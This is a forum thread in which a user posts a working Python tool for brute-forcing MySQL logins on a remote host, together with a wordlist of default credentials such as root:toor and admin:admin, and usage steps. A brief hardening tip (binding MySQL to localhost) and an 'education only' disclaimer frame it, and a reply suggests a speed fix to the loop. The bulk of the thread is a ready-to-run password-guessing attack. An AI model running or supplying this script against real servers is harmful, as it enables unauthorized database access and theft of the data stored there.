Results 1 to 2 of 2

Thread: Crack the MySQL (Database) Username and Password Remotely. Share/Save - My123World.Com!

  1. #1
    Garage Newcomer
    Join Date
    Feb 2012
    Location
    Delhi India
    Posts
    4
    Blog Entries
    1

    Talking Crack the MySQL (Database) Username and Password Remotely.

    Crack the MySQL (Database) Username and Password Remotely.

    AS Per PCI Compliance, If you want to accept Credit card or debit card online, You must have mysql remote connection disabled. If you don't have you will not be able to sale your product from your website. If you have question, why they have such rule ? than below tool will let you know , what can happen, if you don't follow PCI rule.

    Apart from that, if you are really security freaked minded person. Than you should disable your mysql remote connection immediately, atleast for root. you can do that by editing your "mysql configuration file" (my.cnf).
    You need to add below line to prevent mysql remote connection.

    PHP Code:
    bind-address:127.0.0.1 
    "my.cnf" files are most of the time available at "/etc/mysql/my.cnf" in linux/unix and "C:\mysql" or mysql installation directory.

    Enough of reading, let's move on to main point. How to crack mysql username and password remotely.

    I have created repository here in github : https://github.com/krokite/MySQL-Bruteforce-Tool

    System Requirement :
    • Operating System: Windows, Linux, Macinotsh [ All ]
    • Software Required : Python & MySQL


    Software Requirement Description: Python is required to run the tool and MySQL is required to test the connection.

    Steps to run this script :-
    1. Create "credentiallist.txt" file in pattern Username:Password
    2. Run below command python mysql_bruteforce.py
    3. Grab Coffee and Relax now. When Username and Password is cracked, It will print the result and will exit.


    Below are "credentiallist.txt" file demo :-

    Code:
    username:password
    root:
    root:root
    root:toor
    admin:admin
    root:admin
    root:1
    root:12
    root:123
    root:1234
    root:12345
    root:123456
    root:1234567
    root:12345678
    root:123456789
    root:1234567890
    root:a
    root:ab
    root:abc
    root:abcd
    root:abcde
    root:abcdef
    root:abcdefghijklmnopqrstuvwxyz
    root:hacker
    root:password
    And below is your mysql_bruteforce.py file.

    PHP Code:
    #!/usr/bin/python
    # Author : KroKite
    # Description: Basic Password Bruteforcing Tool.
    # URL: http://facebook.com/r0ckysharma

    import sys
    import subprocess
    import re

    print '''
            $$ \ $$\   $$$$$$$\  $$$$$$\   $$\   $$\ $$$$$$\ $$$$$$$$\ $$$$$$$$$|
            $$ | $$ |  $$ __$$ \ $$ __$$\  $$ | $$ | \_$$ _| \__$$ __| $$ ______|
            $$ |$$ /   $$ | $$ | $$ / $$ | $$ |$$ /    $$ |     $$ |   $$ |
            $$$$$ /    $$$$$$$ | $$ | $$ | $$$$$ /     $$ |     $$ |   $$$$$$|
            $$$ $$ \   $$ __$$ | $$ | $$ | $$ $$|      $$ |     $$ |   $$ ___|
            $$ |\$$\   $$ | $$ | $$ | $$ | $$ |\$$\    $$ |     $$ |   $$ |
            $$ | \$$\  $$ | $$ | $$$$$$ |  $$ | \$$\ $$$$$$\    $$ |   $$$$$$$$$|
            \__|  \__| \__| \__| \______/  \__| \__| \______|   \__|   \________|
            '''
    print "[+] Please Report any Bug to krokite@worldofhacker.com"
    print "[+] Greets to: c1ph3r(Krit Kadnok), Nocdem, MayaSeven, Xcode, webDEVIl, fb1h2s, Aseem Jakhar, Prashant Mahajan, and Other NullCon members, Sukesh Reddy, Sarmanjit Singh, Rakesh Kumar"
    print "[+] For Security Releated Discussions, Do Visit us at http://www.garage4hackers.com or http://forum.worldofhacker.com"
    print "[+] This Application helps you to crack mysql password with given list"
    print "[+] Usage: python mysql_bruteforce.py ip_or_hostname_here"
    print "\n"

    fo open("credentiallist.txt"'r');
    for 
    lines in fo:
            
    password lines.split('\n')
            
    creds password[0].split(':')
            if(
    len(sys.argv) == 2):
                    
    command "mysql -h {0} -u {1} -p{2} -e STATUS".format(sys.argv[1], creds[0], creds[1])
                    
    brute subprocess.Popen(command.split(), stdout=subprocess.PIPE)
                    if(
    re.search("Uptime"brute.communicate()[0])):
                            print 
    "Password Cracked and your Username:Password is "creds[0],":",creds[1]
                            exit()
            else:
                    print 
    "[+] Usage: \n\t[+] root@system# chmod u+x mysql_bruteforce.py\n\t[+] root@system# ./mysql_bruteforce.py ip_or_hostname_here"
                    
    exit() 

    Good Luck!

    Note: Kindly note, this tool is for education purpose only. Kindly do not misue, if you misue this tool, I will not be responsible for anything.

  2. #2
    ... I am no Expert b0nd.g4h@gmail.com b0nd's Avatar
    Join Date
    Jul 2010
    Location
    irc.freenode.net #g4h
    Posts
    744
    Hey, good to begin with!

    A logical suggestion here.
    if(len(sys.argv) == 2):
    should be taken out of loop and shall be the first thing to check. In your code, unnecessarily, this condition is getting checked everytime a new credass combo is selected. This would hamper the speed as well.

    Cheers!
    [*] To follow the path: look to the master, follow the master, walk with the master, see through the master,
    ------> become the master!!! <------
    [*] Everyone has a will to WIN but very few have the will to prepare to WIN
    [*] Invest yourself in everything you do, there's fun in being serious

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •